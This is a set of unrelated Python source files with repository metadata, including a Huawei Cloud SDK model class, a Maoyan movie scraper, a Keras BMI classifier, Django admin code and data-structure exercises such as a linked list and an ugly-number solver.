# coding: utf-8 import re import six from huaweicloudsdkcore.sdk_response import SdkResponse from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization class CheckAppV2Response(SdkResponse): """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ sensitive_list = [] openapi_types = { 'name': 'str', 'remark': 'str', 'id': 'str' } attribute_map = { 'name': 'name', 'remark': 'remark', 'id': 'id' } def __init__(self, name=None, remark=None, id=None): """CheckAppV2Response - a model defined in huaweicloud sdk""" super(CheckAppV2Response, self).__init__() self._name = None self._remark = None self._id = None self.discriminator = None if name is not None: self.name = name if remark is not None: self.remark = remark if id is not None: self.id = id @property def name(self): """Gets the name of this CheckAppV2Response. 名称 :return: The name of this CheckAppV2Response. :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this CheckAppV2Response. 名称 :param name: The name of this CheckAppV2Response. :type: str """ self._name = name @property def remark(self): """Gets the remark of this CheckAppV2Response. 描述 :return: The remark of this CheckAppV2Response. :rtype: str """ return self._remark @remark.setter def remark(self, remark): """Sets the remark of this CheckAppV2Response. 描述 :param remark: The remark of this CheckAppV2Response. :type: str """ self._remark = remark @property def id(self): """Gets the id of this CheckAppV2Response. 编号 :return: The id of this CheckAppV2Response. :rtype: str """ return self._id @id.setter def id(self, id): """Sets the id of this CheckAppV2Response. 编号 :param id: The id of this CheckAppV2Response. :type: str """ self._id = id def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: if attr in self.sensitive_list: result[attr] = "****" else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" import simplejson as json if six.PY2: import sys reload(sys) sys.setdefaultencoding("utf-8") return json.dumps(sanitize_for_serialization(self), ensure_ascii=False) def __repr__(self): """For `print`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, CheckAppV2Response): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
[ "hwcloudsdk@huawei.com" ]
hwcloudsdk@huawei.com
606917a953a5ba9bd05e5c654c44e55c2a271996
39fe41a33c00ea6dc8e04c61842c3764fdd07ff1
/DesignPatterns/facade.py
68b49f8243be5c700fa4b1cd862d024366b7471a
[]
no_license
playbar/pylearn
f9639ffa1848a9db2aba52977de6c7167828b317
8bcd1b5a043cb19cde1631947eb128d9c05c259d
refs/heads/master
2021-06-12T01:51:33.480049
2021-03-31T12:16:14
2021-03-31T12:16:14
147,980,595
1
0
null
null
null
null
UTF-8
Python
false
false
824
py
#!/usr/bin/env python # encoding: utf-8 """ 外观模式(门面模式) 为子系统中的一组接口提供一个一致的界面. 定义了一个高层接口, 是的这一子系统更加容易使用 - 统一接口人 - 减少依赖 """ class SystemA(object): def call_a(self): print "call a" class SystemB(object): def call_b(self): print "call b" class SystemC(object): def call_c(self): print "call c" class Facade(object): def __init__(self): self.sys_a = SystemA() self.sys_b = SystemB() self.sys_c = SystemC() def action_a(self): self.sys_a.call_a() self.sys_b.call_b() def action_b(self): self.sys_b.call_b() self.sys_c.call_c() if __name__ == '__main__': facade = Facade() facade.action_a()
[ "hgl868@126.com" ]
hgl868@126.com
9ceb1b638334a728375e941ce1e636ec41bd9100
353def93fa77384ee3a5e3de98cfed318c480634
/.history/week01/homework01/gettop10frommaoyam01_20200626151530.py
77640fcb8bd12bc2890a662ba05e9850d148ab86
[]
no_license
ydbB/Python001-class01
d680abc3ea1ccaeb610751e3488421417d381156
ad80037ccfc68d39125fa94d2747ab7394ac1be8
refs/heads/master
2022-11-25T11:27:45.077139
2020-07-19T12:35:12
2020-07-19T12:35:12
272,783,233
0
0
null
2020-06-16T18:28:15
2020-06-16T18:28:15
null
UTF-8
Python
false
false
3,018
py
# 使用requests,bs4库,爬取猫眼电影top10的电影名称、电影类型、上映时间,并以utf-8的字符集保存到csv文件中 import requests from bs4 import BeautifulSoup as bs import re import pandas as pd maoyanUrl = "https://maoyan.com/board/4"; header = { 'Content-Type': 'text/plain; charset=UTF-8', 'Cookie' : '__mta=251934006.1593072991075.1593140975947.1593145816387.21; uuid_n_v=v1; uuid=2395D3F0B6BC11EA9F28E30FF5FFF73C9A16AE2FA53A448DA75AEAA9D715CB59; _csrf=8557626db9b655cf9050ae7e5b2aab69278c8061c21eca95e1c3cf2130b0b64c; _lxsdk_cuid=172ea8cb247c8-0a73066b1c0a8b-4353760-100200-172ea8cb248c8; _lxsdk=2395D3F0B6BC11EA9F28E30FF5FFF73C9A16AE2FA53A448DA75AEAA9D715CB59; mojo-uuid=c457eacb7c1eb59d3d2f6c1f8d75b9c9; Hm_lvt_703e94591e87be68cc8da0da7cbd0be2=1593072989,1593073002; _lx_utm=utm_source%3Dgoogle%26utm_medium%3Dorganic; __mta=251934006.1593072991075.1593140975947.1593145813576.21; Hm_lpvt_703e94591e87be68cc8da0da7cbd0be2=1593145819; _lxsdk_s=172ef3adc93-67a-f25-f7b%7C%7C1', # 'Host' : 'http://www.baidu.com', 'Origin': 'https://maoyan.com', 'Referer': 'https://maoyan.com/board/4', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', } def get_urls(url, headers): main_url = 'https://maoyan.com' response = requests.get(url,headers=header) bs_info = bs(response.text,"html.parser") films_url = [] for tag in bs_info.find_all('div',attrs={'class':''}): # for tag_p in tag.find_all('a',href=re.compile('/films/')) : # 获取top10电影详情页链接 # films_url.append(main_url + tag_p.get('href')) for ts in tag.find_all('dd',): print(ts) urls = set(films_url) return urls import pandas # 获取详情页 def get_page_info(urls,header): films_content = [] for url in urls: content = get_page_brief(url,header) #print(content) films_content.append(content) return films_content # 获取单个电影的详情信息 def get_page_brief(url,header): response = requests.get(url, headers=header) bs_info = bs(response.text,'html.parser') atag = bs_info.find('div',attrs={'class':'banner'}) film_name = atag.find('h1').text +" "+ atag.find('div',attrs = {'class' : 'ename ellipsis'}).text film_type = "" for type in atag.find_all('a',attrs={'target':'_blank'}): film_type = film_type + type.text tags = atag.find_all('li') online_time = tags[-1].text brief = [film_name,film_type,online_time] return brief # 保存movie信息 def save_movies(movies): print(movies) top10 = pd.DataFrame(data=movies) top10.to_csv('./week01/homework01/top10.csv',encoding='utf-8',index=False,header=False) print('finish') def main(): urls = get_urls(maoyanUrl,header) print(urls) # movies = get_page_info(urls,header) # save_movies(movies) if __name__ == '__main__': main()
[ "31039587+ydbB@users.noreply.github.com" ]
31039587+ydbB@users.noreply.github.com
a52e7b37c644fdf27dd6a147fb363750beeb1170
5be8b0f2ee392abeee6970e7a6364ac9a5b8ceaa
/xiaojian/xiaojian/forth_phase/spider/day06/10_element_elements.py
543da3b7503da3b4d136930167ade6a5d0bf9d12
[]
no_license
Wellsjian/20180826
424b65f828f0174e4d568131da01dafc2a36050a
0156ad4db891a2c4b06711748d2624080578620c
refs/heads/master
2021-06-18T12:16:08.466177
2019-09-01T10:06:44
2019-09-01T10:06:44
204,462,572
0
1
null
2021-04-20T18:26:03
2019-08-26T11:38:09
JavaScript
UTF-8
Python
false
false
359
py
from selenium import webdriver browser = webdriver.Chrome() browser.get('https://www.qiushibaike.com/text/') div = browser.find_element_by_class_name('content') print(div.text) divs = browser.find_elements_by_class_name('content') for div in divs: print('\033[36m------------------------\033[0m') print("*"*60) print(div.text) print('*'*60)
[ "1149158963@qq.com" ]
1149158963@qq.com
7eeebdbd1ca8d9eb2c0e18ced034e18ec6d015fc
3859ee7a1694f30c69e4cb4ee392f3e197b23aaa
/setup.py
47709527027d8e6f99ae7e17716a84e46f4be6f2
[]
no_license
ibell/achp
71467905986ae5f0c7dcab0b2ca98bfd0aa30977
1003d16c651447d0068173e6d3186ebae9672bb1
refs/heads/master
2016-08-02T21:40:56.971781
2013-10-26T23:33:45
2013-10-26T23:33:45
12,282,085
8
1
null
null
null
null
UTF-8
Python
false
false
1,475
py
from distutils.core import setup, Extension import subprocess,shutil,os,sys # Obtain the numpy include directory. This logic works across numpy versions. ## import numpy ## try: ## numpy_include = numpy.get_include() ## except AttributeError: ## numpy_include = numpy.get_numpy_include() sys.argv += ['install','--reswig'] if '--reswig' in sys.argv: import subprocess subprocess.check_output(['swig','-python','-c++','-I../externals/coolprop','-I../externals/thermalcorr','ACHP.i'],cwd = 'src') sys.argv.remove('--reswig') numpy_include=[''] commons = dict(include_dirs = ['externals'], libraries = ['CoolPropLib_MD','ThermalCorr_MD'], library_dirs = ['externals/coolprop/wrappers/StaticLibrary/VS2008','externals/thermalcorr/wrappers/StaticLibrary/VS2008'], ) ACHP_module = Extension('ACHP._ACHP', sources=['src/ACHP_wrap.cxx', 'src/Compressor.cpp', 'src/BPHE.cpp'], **commons ) setup (name = 'ACHP', version = '0.0.1dev', package_dir = {'ACHP':'src'}, packages = ['ACHP'], author = "Ian Bell", author_email='ian.h.bell@gmail.com', url='http://achp.sourceforge.net', description = """ Steady-state system model using moving boundary models """, ext_modules = [ACHP_module], )
[ "ian.h.bell@gmail.com" ]
ian.h.bell@gmail.com
f0f4fb7a984294ff86a025ef21742ce630c55ed9
28a462a28f443c285ca5efec181ebe36b147c167
/tests/compile/basic/es2020/Assertion[3,0].Evaluation.spec
ad2d76f4da932e0db88fb74aa47a081acc9841be
[ "BSD-3-Clause", "BSD-2-Clause" ]
permissive
kaist-plrg/jstar
63e71f9156860dc21cccc33a9f6c638dfee448ea
1282919127ea18a7e40c7a55e63a1ddaaf7d9db4
refs/heads/main
2022-07-22T08:12:34.947712
2022-02-27T04:19:33
2022-02-27T11:06:14
384,045,526
6
4
NOASSERTION
2022-02-27T11:05:26
2021-07-08T07:53:21
Python
UTF-8
Python
false
false
587
spec
1. Return a new Matcher with parameters (_x_, _c_) that captures nothing and performs the following steps when called: 1. Assert: _x_ is a State. 1. Assert: _c_ is a Continuation. 1. Let _e_ be _x_'s _endIndex_. 1. Call IsWordChar(_e_ - 1) and let _a_ be the Boolean result. 1. Call IsWordChar(_e_) and let _b_ be the Boolean result. 1. If _a_ is *true* and _b_ is *true*, or if _a_ is *false* and _b_ is *false*, then 1. Call _c_(_x_) and return its result. 1. Return ~failure~.
[ "h2oche22@gmail.com" ]
h2oche22@gmail.com
78359dbbfdcc0879f9aa11bc2d8d6be24d39d081
1f74112d7e90c278c66c085db9ef44abcea0cf39
/tests.py
98be0ee734d9238cd077be193edb45cc654c4c3e
[]
no_license
mmahnken/pronounce_gaelic
22c0a6b4cf97204ef0cfbfd0c22bca9968d59613
23ef9c4ab1e44e8e06fcb5582260a7d9b0f5203d
refs/heads/master
2016-09-10T12:57:28.199943
2015-05-25T17:18:43
2015-05-25T17:18:43
29,276,608
3
0
null
null
null
null
UTF-8
Python
false
false
2,355
py
import random import unittest import compare as c import os TRAINING_DIR = 'gaelic_audio' USER_AUDIO = 'window_meggie.wav' USER_REF_AUDIO = 'gaelic_audio/window.mp3' class TestMatchingAlgorithm(unittest.TestCase): def setUp(self): print "setting up audio match test" self.comparator = c.train(TRAINING_DIR) self.training_dir = TRAINING_DIR training_files = [os.path.join(TRAINING_DIR, f) for f in os.listdir(TRAINING_DIR)] self.random_ref_file = random.choice(training_files) self.user_audio = USER_AUDIO self.user_ref_audio = USER_REF_AUDIO def test_self_equality(self): """Given reference audio x, test whether querying x returns x in the top 3 matching results.""" results = c.compare(self.random_ref_file, self.random_ref_file, self.comparator) self.assertTrue(self.random_ref_file in results[0:3]) def test_strict_self_equality(self): """Given reference audio x, test whether querying x returns x as the highest matching result.""" results = c.compare(self.random_ref_file, self.random_ref_file, self.comparator) self.assertTrue(self.random_ref_file == results[0]) def test_audio_search(self): """Given user generated audio x, test whether the the corresponding reference file y for the same word is in the top 3 matching results.""" results = c.compare(self.user_ref_audio, self.user_audio, self.comparator) self.assertTrue(self.random_ref_file == results[0:3]) class TestPointsOfOnset(unittest.TestCase): def setUp(self): training_files = [os.path.join(TRAINING_DIR, f) for f in os.listdir(TRAINING_DIR)] self.ref_file_1 = random.choice(training_files) while self.ref_file_1 == ref_file_2: ref_file_2 = random.choice(training_files) self.ref_file_2 = ref_file_2 def test_different_points_of_onset(self): pass # get 2 random audio files # find points of onset for each # make sure the two are not equal def test_similar_points_of_onset(self): pass # get a reference and homemade audio file for same signal # find points of onset for each # make sure the two are relatively similar if __name__ == "__main__": unittest.main()
[ "mmm25eg@gmail.com" ]
mmm25eg@gmail.com
b7a63d862fb96580c9845b39a7cf5f65eefcfe72
4351a81d4a4fae778711643cb9644534e595920d
/Python 3/LeetCode/lc107.py
9a8872ffa11f932a887dc4e49d3d1c1784327c59
[]
no_license
nsmith0310/Programming-Challenges
ba1281127d6fa295310347a9110a0f8998cd89ce
7aabed082826f8df555bf6e97046ee077becf759
refs/heads/main
2023-08-13T14:47:10.490254
2021-10-13T04:35:57
2021-10-13T04:35:57
416,565,430
0
0
null
null
null
null
UTF-8
Python
false
false
1,479
py
# Definition for a binary tree node. # class TreeNode: # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution: def levelOrderBottom(self, root: TreeNode) -> List[List[int]]: if root==None:return root tmp = [[root,1,0,-1]] count = 0 o = [root.val] for x in tmp: count+=1 if x[0].right!=None: tmp.append([x[0].right,x[1]+1,1,count]) o.append(x[0].right.val) if x[0].left!=None: tmp.append([x[0].left,x[1]+1,0,count]) o.append(x[0].left.val) tmp.sort(key = lambda x: x[1]) l = [[] for j in range(0,tmp[-1][1])] i = 0 while i<len(tmp): l[tmp[i][1]-1].append([tmp[i][0].val,tmp[i][2],tmp[i][3]]) i+=1 l = l[::-1] ###print(l) f = [[] for x in l] i = 0 while i<len(l): tmp = l[i] left = [] for x in tmp: left.append([x[0],x[2]]) left.sort(key=lambda x: x[1]) left = left[::-1] for y in left: f[i].append(y[0]) i+=1 return f
[ "92414264+nsmith0310@users.noreply.github.com" ]
92414264+nsmith0310@users.noreply.github.com
d2e0aba87f3f9b8864b351aa8b50b156159ae731
667f896c43a92d58a00d8a0899a68afdf7bdf2d6
/comments/admin.py
b8c35fd1f61901d7b0c59fdb8dee3a6e320c1778
[]
no_license
blazer-05/myshop3
bfa9ac1072122bbecea3bbfac6ee59c44d1d3ac6
8a91f04fc3dfa6a0d07934c5f8a6e87c39b3da61
refs/heads/master
2022-11-25T01:31:16.613811
2020-05-06T07:37:30
2020-05-06T07:37:30
141,247,818
2
2
null
2022-11-22T03:22:57
2018-07-17T07:18:38
HTML
UTF-8
Python
false
false
2,734
py
from django.contrib import admin from django.utils.safestring import mark_safe from django_summernote.admin import SummernoteModelAdmin from comments.models import Comment # Функции фильтрации для массовой публикации/снятия с публикации новостей. def all_post(modeladmin, request, queryset): for qs in queryset: print(qs.title) def complete_post(modeladmin, request, queryset): queryset.update(is_active=True) complete_post.short_description = 'Опубликовать новость' def incomplete_post(modeladmin, request, queryset): queryset.update(is_active=False) incomplete_post.short_description = 'Снять с публикации новость' # Конец Функции фильтрации @admin.register(Comment) class CommentAdmin(SummernoteModelAdmin): list_display = ['id', 'content_object', 'sender', 'is_authenticated', 'text_format', 'email', 'like', 'dislike', 'is_active', 'created', 'updated'] list_editable = ['is_active', ] list_display_links = ['content_object'] # Выводит в админке какие поля будут в виде ссылок. list_per_page = 10 # Вывод количества комментариев в админке actions = [complete_post, incomplete_post] # Методы complete_post, incomplete_post для массового снятия/публикации товаров. def sender(self, obj): '''Метод определяет в одном столбце кто добавил комментарий user или user_name (т.е. зарегистрированный или нет пользовватель)''' return obj.user or obj.user_name sender.short_description = 'Отправитель' def is_authenticated(self, obj): '''Метод определяет в одном столбце от кого был комментарий от авторизаванного или анонимного пользователя''' return bool(obj.user) is_authenticated.short_description = 'Зарегистрирован' is_authenticated.boolean = True def text_format(self, obj): '''Метод, который убирает в админке в поле text теги <p><br></p> от визуального редактора Summernote. В настройках суммернота не получилось это сделать.''' return mark_safe(obj.text) text_format.short_description = 'Комментарии' def content_object(self, content_object): return content_object content_object.short_description = 'Новость'
[ "blazer-05@mail.ru" ]
blazer-05@mail.ru
765c3cd1cbf0657bb02da732081d4795110463e2
b2a45f26d41930e4e9d304bcff74221029fe48c1
/target_offer/34_丑数.py
e4dfbfd82c4745033f0337cf8ec1e9655ff947b1
[]
no_license
Hk4Fun/algorithm_offer
29db9a9565f6e7400539f8c3b85cceb524918964
b1764cd62e1c8cb062869992d9eaa8b2d2fdf9c2
refs/heads/master
2021-07-01T04:22:58.168117
2019-04-02T12:26:32
2019-04-02T12:26:32
115,990,532
1
0
null
null
null
null
UTF-8
Python
false
false
6,653
py
__author__ = 'Hk4Fun' __date__ = '2018/2/10 21:06' '''题目描述: 把只包含质因子2、3和5的数称作丑数(Ugly Number)。例如6、8都是丑数,但14不是,因为它包含质因子7。 习惯上我们把1当做是第一个丑数。求按从小到大的顺序的第N个丑数。 ''' '''主要思路: 思路1:逐个判断每个数是否为丑数,直观但不够高效。 如果一个数能被2整除,就把它连续除以2; 如果能被3整除,就把它连续除以3; 如果能被5整除,就把它连续除以5。 如果最后我们得到的是1,那么这个数就是丑数。 该算法最大的问题就是每个整数都要计算, 即使一个数字不是丑数我们还是要对它进行求余和除法操作。 思路2:创建数组保存已经找到的丑数并排好序,关键在于如何生成下一个丑数 数组中最后一个丑数最大,记为M。设置index2,标记该位置的数乘以2大于M, 同理设置index3、index5,这样每次只需求min(A[index2]*2,A[index3]*3,A[index5]*5) 就可求出下一个丑数,然后更新三个标记。这样关键就在于如何更新这三个标记, 对于index2,只需往后遍历,直到指向的那个数乘2大于M即可停止,其他两个同理。 空间换时间,比思路1时间上快了不少 思路3:对思路2的改进,对于如何更新那三个标记,仔细推敲可以发现其实 只需让那些指向的数乘相应因子等于当前M的标记往后移一位即可, 因为 M = min(A[index2]*2,A[index3]*3,A[index5]*5),则至少有个标记是要往后移的, 且移一位即可,后面那个数乘以相应的因子一定大于M。 那么其他指向的数乘相应因子不等于当前M的标记为什么没有必要移动呢? 还是因为 M = min(A[index2]*2,A[index3]*3,A[index5]*5), 既然M是其中最小的, 那么其他的标记所指向的数乘以相应因子一定就比M大了,没有必要更新 这样就可以把思路2中的三个并列的while简化成三个并列的if 更新:这里谈谈为什么要使用这三个index,且为什么这样做可以保证按顺序产生下一个丑数。 按照正常的理解,后面的丑数都是由前面已经产生的某个丑数乘2或乘3或乘5得到,为了按照顺序, 必须把前面每个丑数乘2或乘3或乘5得到的值中取大于当前最后一个丑数的最小值。 那么问题来了,有必要把每个丑数都乘这三个因子然后取最小值? 我们发现每个丑数都要经历乘2乘3乘5的过程,但却没有必要在同一次竞争下一个丑数中乘, 所以我们反过来,标记上那些需要乘2或乘3或乘5的数,使得index2指向的数就要乘2, 因为它在下一次竞争中可能会胜利,index3和index5同理。为了满足以上规则, 我们让这三个标记从左向右各自独立遍历,这样也就让每个数都会经历乘2或乘3或乘5的过程, 且如果标记的数乘以相应因子后竞争胜利了,那么该标记就要往后挪1位, 因为新的丑数是该标记因子乘以它指向的数竞争胜利而生成的, 所以该数乘以该因子已经没有参与下一次竞争的机会了,相应的因子标记就该往后挪, 使得下一个数参与新的竞争。而其他竞争失败的标记不用动,因为它们还有竞争胜利的机会, 毕竟每次胜利的是那个乘积最小的。 ''' class Solution: def GetUglyNumber1(self, index): def isUgly(number): while number % 2 == 0: number //= 2 while number % 3 == 0: number //= 3 while number % 5 == 0: number //= 5 return number == 1 if not index or index <= 0: return 0 number = uglyFound = 0 while uglyFound < index: number += 1 if isUgly(number): uglyFound += 1 return number def GetUglyNumber2(self, index): if not index or index <= 0: return 0 uglyNumbers = [1] index2 = index3 = index5 = 0 for i in range(1, index): # 竞争产生下一个丑数 uglyNumbers.append(min(uglyNumbers[index2] * 2, uglyNumbers[index3] * 3, uglyNumbers[index5] * 5)) while uglyNumbers[index2] * 2 <= uglyNumbers[-1]: index2 += 1 while uglyNumbers[index3] * 3 <= uglyNumbers[-1]: index3 += 1 while uglyNumbers[index5] * 5 <= uglyNumbers[-1]: index5 += 1 return uglyNumbers[-1] def GetUglyNumber3(self, index): if not index or index <= 0: return 0 if index < 7: # 小于7的丑数连续 return index uglyNumbers = [1] index2 = index3 = index5 = 0 for _ in range(index - 1): # 竞争产生下一个丑数 uglyNumbers.append(min(uglyNumbers[index2] * 2, uglyNumbers[index3] * 3, uglyNumbers[index5] * 5)) # 把思路2中的三个并列的while简化成三个并列的if # 可能会有多个标记竞争胜利,即丑数恰好是前面标记所在值的公倍数 # 因此必须是并列的if,不能if...elif...else if uglyNumbers[-1] == uglyNumbers[index2] * 2: index2 += 1 if uglyNumbers[-1] == uglyNumbers[index3] * 3: index3 += 1 if uglyNumbers[-1] == uglyNumbers[index5] * 5: index5 += 1 return uglyNumbers[-1] # ================================测试代码================================ from Test import Test class MyTest(Test): def my_test_code(self): # 只需在此处填写自己的测试代码 # testArgs中每一项是一次测试,每一项由两部分构成 # 第一部分为被测试函数的参数,第二部分只有最后一个,为正确答案 self.debug = True testArgs = [] testArgs.append([1, 1]) testArgs.append([2, 2]) testArgs.append([3, 3]) testArgs.append([4, 4]) testArgs.append([5, 5]) testArgs.append([6, 6]) testArgs.append([7, 8]) testArgs.append([8, 9]) testArgs.append([9, 10]) testArgs.append([10, 12]) testArgs.append([11, 15]) # testArgs.append([1500, 859963392]) testArgs.append([0, 0]) return testArgs def convert(self, result, *func_arg): return result if __name__ == '__main__': solution = Solution() MyTest(solution=solution).start_test()
[ "941222165chenhongwen@gmail.com" ]
941222165chenhongwen@gmail.com
2952d3163c6deb0bb67610b3eb1032741fce506b
6dd400fec6f302bd0dcf309e2deec5de906d205c
/anal_pro4/deep_learn3/tf_classifi7_ex.py
c0b46953504a7cddfb096583808dd5790dc9ab65
[]
no_license
Leo-hw/psou
aa938b7cfaa373a0980649125270c48d816202b0
70379156a623257d412bcccbac72986a61226bd4
refs/heads/master
2023-02-21T19:00:02.902510
2021-01-25T07:03:26
2021-01-25T07:03:26
332,616,685
1
0
null
null
null
null
UTF-8
Python
false
false
2,875
py
import numpy as np import matplotlib.pyplot as plt from sklearn.model_selection import train_test_split from sklearn.preprocessing import OneHotEncoder, StandardScaler from sklearn.metrics import roc_curve, auc from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense import pandas as pd from sklearn.metrics import confusion_matrix, classification_report, accuracy_score data = pd.read_csv('https://raw.githubusercontent.com/pykwon/python/master/testdata_utf8/bmi.csv') print(data.head(3)) print(data.info()) replace = {'thin':0,'normal':1,'fat':2} data = data.replace({'label':replace}) x = np.array(data.iloc[:,:-1]) # print(x.shape) y_data = np.array(data.iloc[:,-1]) # print(x_data) # print(y_data) onehot = OneHotEncoder(categories='auto') y = onehot.fit_transform(y_data[:,np.newaxis]).toarray() # print(x) # print(y) # 표준화 ''' scaler = StandardScaler() x = scaler.fit_transform(x) print(x[:2]) ''' x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=1) print(x_train.shape,' ', x_test.shape) # (14000, 2) (6000, 2) print(y_train.shape,' ', y_test.shape) # (14000, 3) (6000, 3) model = Sequential() model.add(Dense(32, input_dim=2, activation='relu')) model.add(Dense(16, activation='relu')) model.add(Dense(8, activation='relu')) model.add(Dense(3, activation='softmax')) # print(model.summary()) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) history = model.fit(x_train,y_train, epochs=20, batch_size=32,verbose=2) print('모델 검증 : ', model.evaluate(x_test, y_test)) print('----------------') y_pred = np.argmax(model.predict(x_test), axis= 1) print('예측값 :', y_pred) real_y = np.argmax(y_test, axis =1).reshape(-1,1) print('실제값 :', real_y.ravel()) print('-------------') plt.figure(figsize=(12,4)) plt.subplot(121) plt.plot(history.history['loss'],'b-',label='loss') plt.xlabel('Epoch') plt.ylabel('loss') plt.legend() plt.subplot(122) plt.plot(history.history['accuracy'],'r-',label='acc') plt.xlabel('Epoch') plt.ylabel('accuracy') plt.legend() plt.show() plt.figure() plt.plot([0, 1], [0, 1], 'k--') pred_y = model.predict(x_test) fpr, tpr, _ = roc_curve(y_test.ravel(),pred_y.ravel()) print('AUC: ',auc(fpr,tpr)) plt.plot(fpr, tpr) plt.xlabel('False Positive rate') plt.ylabel('True Positive rate') plt.title('ROC Curve') plt.legend() plt.show() print('confusion_matrix \n',confusion_matrix(real_y, y_pred)) print('accuracy : ', accuracy_score(real_y, y_pred)) print('classification_report : \n', classification_report(real_y, y_pred)) height = float(input('height : ')) weight = float(input('weight : ')) new_x = [[height,weight]] new_pred = model.predict(new_x) print('new_pred : ', np.argmax(new_pred, axis = 1))
[ "Bonghwan@DESKTOP-60LSTNL" ]
Bonghwan@DESKTOP-60LSTNL
d00caac2348180d52c10a1aca86c341683d7ad20
ec99362e7b0f9b6f96cd92c995a388c149655d3e
/ggvinfosite/ggvinfosite/wsgi.py
99b30d968bcb39576ccd96fee6ae2ac0fcbae093
[]
no_license
anidem/ggv-info-py
5d43f1fe0e14b9a3db775276d31a5405d7ee9c69
1b2e772575cd7ea163aaaae7b871fbf937294d43
refs/heads/master
2021-01-20T17:58:30.684821
2016-08-09T04:30:35
2016-08-09T04:30:35
60,475,905
0
0
null
null
null
null
UTF-8
Python
false
false
498
py
""" WSGI config for ggvinfosite project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application from mezzanine.utils.conf import real_project_name os.environ.setdefault("DJANGO_SETTINGS_MODULE", "%s.settings" % real_project_name("ggvinfosite")) application = get_wsgi_application()
[ "richmedina@gmail.com" ]
richmedina@gmail.com
e8b7a74f2a29bbe1760be0f63fe1f519849bd05a
270e3cf2d508d916e8aaa5c4210fa593ff4c3a72
/Python_Scripting/Pycharm_projects/DataStructures/LinkedList/SingleLinkedList/SingleLinkedList.py
87b9c4a732555029d1a0c10f2f405bc5abf57fd9
[]
no_license
NagiReddyPadala/python_programs
140c45ee1e763ec4aa8ef975be18c5fad1e0a7ec
18d91095c0e25345b8c1bc16d121df9a40639c5f
refs/heads/master
2020-12-08T03:29:35.030951
2020-02-29T16:23:36
2020-02-29T16:23:36
232,871,073
0
0
null
null
null
null
UTF-8
Python
false
false
8,078
py
class Node(): def __init__(self, data): self.data = data self.next = None class LinkedList(): def __init__(self): self.head = None def append(self, data): new_node = Node(data) if self.head is None: self.head = new_node return last_node = self.head while last_node.next: last_node = last_node.next last_node.next = new_node def prepend(self, data): new_node = Node(data) new_node.next = self.head self.head = new_node def insertAfterNode(self, prevNode, data): new_node = Node(data) new_node.next = prevNode.next prevNode.next = new_node def delete_node(self, data): cur_node = self.head if cur_node and cur_node.data == data: self.head = cur_node.next cur_node = None return prev_node = None while cur_node and cur_node.data != data: prev_node = cur_node cur_node = cur_node.next if prev_node: prev_node.next = cur_node.next cur_node = None def delete_node_at_pos(self, pos): cur_node = self.head if pos == 0: self.head = cur_node.next cur_node = None return prev_node = None count = 1 while cur_node and count <= pos: prev_node = cur_node cur_node = cur_node.next count += 1 if prev_node: prev_node.next = cur_node.next cur_node = None def length(self): cur_node = self.head count = 0 while cur_node: cur_node = cur_node.next count += 1 print("Length of the linked list is: ", count) return count def swap_nodes(self, key1, key2): if key1 == key2: return prev1 = None cur1 = self.head while cur1 and cur1.data != key1: prev1 = cur1 cur1 = cur1.next prev2 = None cur2 = self.head while cur2 and cur2.data != key2: prev2 = cur2 cur2 = cur2.next if not cur1 or not cur2: return if prev1: prev1.next = cur2 else: self.head = cur2 if prev2: prev2.next = cur1 else: self.head = cur1 cur1.next, cur2.next = cur2.next, cur1.next def reverse_iterative(self): prev = None curr = self.head while curr: next = curr.next curr.next = prev prev = curr curr = next self.head = prev def recursive_reverse(self): def _recursive_reverse(curr, prev): if not curr: return prev next = curr.next curr.next = prev prev = curr curr = next return _recursive_reverse(curr, prev) self.head = _recursive_reverse(curr = self.head, prev = None) def merge_sorted(self, llist): p = self.head q = llist.head s = None if not p: return q if not q: return p if p and q: if p.data <= q.data: s = p p = s.next else: s = q q = s.next new_head = s while p and q: if p.data <= q.data: s.next = p s = p p = s.next else: s.next = q s = q q = s.next if not p: s.next = q if not q: s.next = p def remove_duplicates(self): cur_node = self.head prev_node = None dup_values = dict() while cur_node: if cur_node.data in dup_values: prev_node.next = cur_node.next cur_node = None else: dup_values[cur_node.data] = 1 prev_node = cur_node cur_node = prev_node.next def print_nth_from_last(self, n): total_len = self.length() cur_node = self.head while cur_node: if total_len == n: print(cur_node.data) return total_len -= 1 cur_node = cur_node.next if cur_node is None: return def count_occurances_iterative(self, val): cur_node = self.head count = 0 while cur_node: if cur_node.data == val: count += 1 cur_node = cur_node.next return count def count_occurances_recursive(self, node, data): if not node: return 0 if node.data == data: return 1 + self.count_occurances_recursive(node.next, data) else: return self.count_occurances_recursive(node.next, data) def rotate(self, k): p = self.head q = self.head prev = None count = 0 while p and count < k: prev = p p = p.next q = q.next count += 1 p = prev while q: prev = q q = q.next q = prev q.next = self.head self.head = p.next p.next = None def move_tail_to_head(self): last = self.head second_to_last = None while last.next: second_to_last = last last = last.next last.next = self.head second_to_last.next = None self.head = last def printllist(self): cur_node = self.head while cur_node: print(cur_node.data) cur_node = cur_node.next # llist = LinkedList() # print("Head is: ", llist.head) # llist.append("A") # print("Head is: ", llist.head) # llist.append("B") # llist.append("C") # llist.append("D") """ print("Head is: ", llist.head) llist.printllist() print("Head is: ", llist.head) llist.prepend("C") llist.printllist() 